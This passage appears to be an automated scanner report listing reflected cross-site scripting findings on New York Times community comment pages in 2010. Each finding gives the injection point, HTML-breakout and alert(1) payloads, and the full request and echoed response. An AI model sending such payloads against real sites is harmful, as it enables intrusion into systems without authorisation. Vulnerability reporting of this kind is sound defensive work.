/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ |
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78489"><a>817c3be883f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /comments78489"><a>817c3be883f/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 120314
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Tangled ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments78489"><a>817c3be883f/artsbeat.blogs.nytimes.com/yr/mo/day/tangled-web-of-rubicon-unravels-at-amc/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponL ...[SNIP]...
|
3.95. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8d7d"><a>64403273679 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /comments/artsbeat.blogs.nytimes.comb8d7d"><a>64403273679/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:54 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 33735
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Tangled ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.comb8d7d"><a>64403273679/yr/mo/day/tangled-web-of-rubicon-unravels-at-amc/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom7,Bottom8,Bo ...[SNIP]...
|
3.96. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload adb13"-alert(1)-"3ff71f84a46 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/?adb13"-alert(1)-"3ff71f84a46=1 HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:34 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 111743
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Tangled ...[SNIP]... nytimesglobal,nytartsbeat"; var dcsvid = ""; var regstatus = "non-registered"; var s_prop1 = "comments"; var s_prop5 = "63_142657"; var s_pagename = "2010/11/11/tangled-web-of-rubicon-unravels-at-amc/?adb13"-alert(1)-"3ff71f84a46=1"; var s_channel = "artsbeat"; Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" ); Tacoda_AMS_DDC_addPair( "t_section","" ); </script> ...[SNIP]...
|
3.97. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ [REST URL parameter 1]
previous
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ |
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 683a8"><a>11401750f9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /comments683a8"><a>11401750f9d/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:27 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 71155
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Book Re ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments683a8"><a>11401750f9d/artsbeat.blogs.nytimes.com/yr/mo/day/book-review-podcast-the-emperor-of-all-maladies/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpro ...[SNIP]...
|
3.98. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ [REST URL parameter 1]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ |
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d604c'-alert(1)-'959e8c51a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commentsd604c'-alert(1)-'959e8c51a4/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:35 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 71222
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Book Re ...[SNIP]... <script type="text/javascript" language="Javascript"> //Variables defined for the Overflow page NYTD.CRNR = window.NYTD.CRNR || {}; NYTD.CRNR.pageType = 'commentsd604c'-alert(1)-'959e8c51a4'; NYTD.CRNR.commentElement = 'submitComments'; NYTD.CRNR.bozoElement = 'bozo'; NYTD.CRNR.ratingToggle = false; NYTD.CRNR.formToggle = true; NYTD.CRNR.pageVertical = 'blogs'; </sc ...[SNIP]...
|
3.99. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0ae8"><a>8de1386f669 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /comments/artsbeat.blogs.nytimes.comd0ae8"><a>8de1386f669/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 34121
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Book Re ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.comd0ae8"><a>8de1386f669/yr/mo/day/book-review-podcast-the-emperor-of-all-maladies/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom7,B ...[SNIP]...
|
3.100. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39b70"-alert(1)-"15696141ef9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/?39b70"-alert(1)-"15696141ef9=1 HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:24 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 70687
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Book Re ...[SNIP]... obal,nytartsbeat"; var dcsvid = ""; var regstatus = "non-registered"; var s_prop1 = "comments"; var s_prop5 = "63_142919"; var s_pagename = "2010/11/12/book-review-podcast-the-emperor-of-all-maladies/?39b70"-alert(1)-"15696141ef9=1"; var s_channel = "artsbeat"; Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" ); Tacoda_AMS_DDC_addPair( "t_section","" ); </script> ...[SNIP]...
|
3.101. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ [REST URL parameter 1]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ |
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f44b'-alert(1)-'ffb7079026e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments6f44b'-alert(1)-'ffb7079026e/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:34 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 71428
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Here Co ...[SNIP]... <script type="text/javascript" language="Javascript"> //Variables defined for the Overflow page NYTD.CRNR = window.NYTD.CRNR || {}; NYTD.CRNR.pageType = 'comments6f44b'-alert(1)-'ffb7079026e'; NYTD.CRNR.commentElement = 'submitComments'; NYTD.CRNR.bozoElement = 'bozo'; NYTD.CRNR.ratingToggle = false; NYTD.CRNR.formToggle = true; NYTD.CRNR.pageVertical = 'blogs'; </sc ...[SNIP]...
|
3.102. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ [REST URL parameter 1]
previous
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ |
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a761b"><a>0b788a6f155 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /commentsa761b"><a>0b788a6f155/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:26 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 71340
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Here Co ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/commentsa761b"><a>0b788a6f155/artsbeat.blogs.nytimes.com/yr/mo/day/here-comes-rhymin-simon-on-a-different-label/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2 ...[SNIP]...
|
3.103. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e568"><a>5f636f3fe12 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /comments/artsbeat.blogs.nytimes.com8e568"><a>5f636f3fe12/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:35 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 34004
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Here Co ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.com8e568"><a>5f636f3fe12/yr/mo/day/here-comes-rhymin-simon-on-a-different-label/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom7,Bott ...[SNIP]...
|
3.104. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28ef0"-alert(1)-"0efdcf8adda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/?28ef0"-alert(1)-"0efdcf8adda=1 HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:22 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 70837
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Here Co ...[SNIP]... sglobal,nytartsbeat"; var dcsvid = ""; var regstatus = "non-registered"; var s_prop1 = "comments"; var s_prop5 = "63_143041"; var s_pagename = "2010/11/12/here-comes-rhymin-simon-on-a-different-label/?28ef0"-alert(1)-"0efdcf8adda=1"; var s_channel = "artsbeat"; Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" ); Tacoda_AMS_DDC_addPair( "t_section","" ); </script> ...[SNIP]...
|
3.105. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [REST URL parameter 1]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ |
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e835'-alert(1)-'6462f262221 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments8e835'-alert(1)-'6462f262221/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:29 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 83378
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Kanye W ...[SNIP]... <script type="text/javascript" language="Javascript"> //Variables defined for the Overflow page NYTD.CRNR = window.NYTD.CRNR || {}; NYTD.CRNR.pageType = 'comments8e835'-alert(1)-'6462f262221'; NYTD.CRNR.commentElement = 'submitComments'; NYTD.CRNR.bozoElement = 'bozo'; NYTD.CRNR.ratingToggle = false; NYTD.CRNR.formToggle = true; NYTD.CRNR.pageVertical = 'blogs'; </sc ...[SNIP]...
|
3.106. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [REST URL parameter 1]
previous
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ |
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf869"><a>05cee7fdfb2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /commentscf869"><a>05cee7fdfb2/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 83360
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Kanye W ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/commentscf869"><a>05cee7fdfb2/artsbeat.blogs.nytimes.com/yr/mo/day/kanye-west-was-coached-for-today-interview-gone-awry/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_ass ...[SNIP]...
|
3.107. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3ba3"><a>7ad4e47b7bb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /comments/artsbeat.blogs.nytimes.comf3ba3"><a>7ad4e47b7bb/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 34445
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Kanye W ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.comf3ba3"><a>7ad4e47b7bb/yr/mo/day/kanye-west-was-coached-for-today-interview-gone-awry/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bott ...[SNIP]...
|
3.108. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8483d"-alert(1)-"5bab4140001 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/?8483d"-alert(1)-"5bab4140001=1 HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:15 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 81137
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Kanye W ...[SNIP]... nytartsbeat"; var dcsvid = ""; var regstatus = "non-registered"; var s_prop1 = "comments"; var s_prop5 = "63_143059"; var s_pagename = "2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/?8483d"-alert(1)-"5bab4140001=1"; var s_channel = "artsbeat"; Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" ); Tacoda_AMS_DDC_addPair( "t_section","" ); </script> ...[SNIP]...
|
